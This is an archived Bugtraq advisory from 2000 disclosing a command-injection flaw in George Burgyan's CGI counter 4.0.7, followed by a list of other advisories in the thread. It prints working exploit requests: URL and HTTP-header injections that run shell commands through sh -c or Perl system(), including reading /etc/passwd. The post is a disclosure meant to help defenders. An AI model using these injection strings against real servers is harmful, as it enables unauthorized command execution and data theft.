Bugtraq mailing list archives
Vulnerability in CGI counter 4.0.7 by George Burgyan
From: hmkash () ARL MIL (Howard M. Kash III)
Date: Mon, 15 May 2000 10:24:47 EDT
I've found no mention of this vulnerability in Bugtraq or in the CVE nor have I been able to contact the author, so I'm posting here to give everyone the opportunity to protect themselves. This vulnerability is being actively exploited and has been reported to CERT. The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server. Of course, other exploits can be used to get root access on an unpatched OS. The counter consists of a perl script called "counter", and multiple links to counter called counter-ord, counterfiglet, counterfiglet-ord, counterbanner, and counterbanner-ord. The following examples illustrate how they can be exploited: Using straight URL ------------------ http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id Passing commands in a variable ------------------------------
telnet web-server www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0 X: pwd;ls -la /etc;cat /etc/passwd
telnet web-server www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0 X: echo;id;uname -a;w The counter was last updated in 1995 so is probably no longer supported. Links and email addresses referenced in the source code are no longer valid. However, it appears to still be widely used based on the number of references returned by search engine queries. Howard Kash
Current thread:
- Alert: IIS ism.dll exposes file contents, (continued)
- Alert: IIS ism.dll exposes file contents Cerberus Security Team (May 11)
- ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
- Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
- Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
- IE Domain Confusion Vulnerability Foo Bar (May 11)
- Overflow in Outlook Express 4.* - too long filenames with graphic format extension Ultor (May 12)
- Eudora Sensitive to Long Filenames Ron Moritz (May 18)
- IE Domain Confusion Vulnerability is an Email problem also Richard M. Smith (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Marc Slemko (May 12)
- Re: IE Domain Confusion Vulnerability doesn't matter much Richard M. Smith (May 15)
- Vulnerability in CGI counter 4.0.7 by George Burgyan Howard M. Kash III (May 15)
- Vulnerability in EMURL-based e-mail providers Pierre Benoit (May 15)
- New Solaris root exploit for /usr/lib/lp/bin/netpr Anonymous (May 12)
- Microsoft Security Bulletin (MS00-034) Microsoft Product Security (May 12)
- Microsoft Office 2000 Advisory dildog (May 12)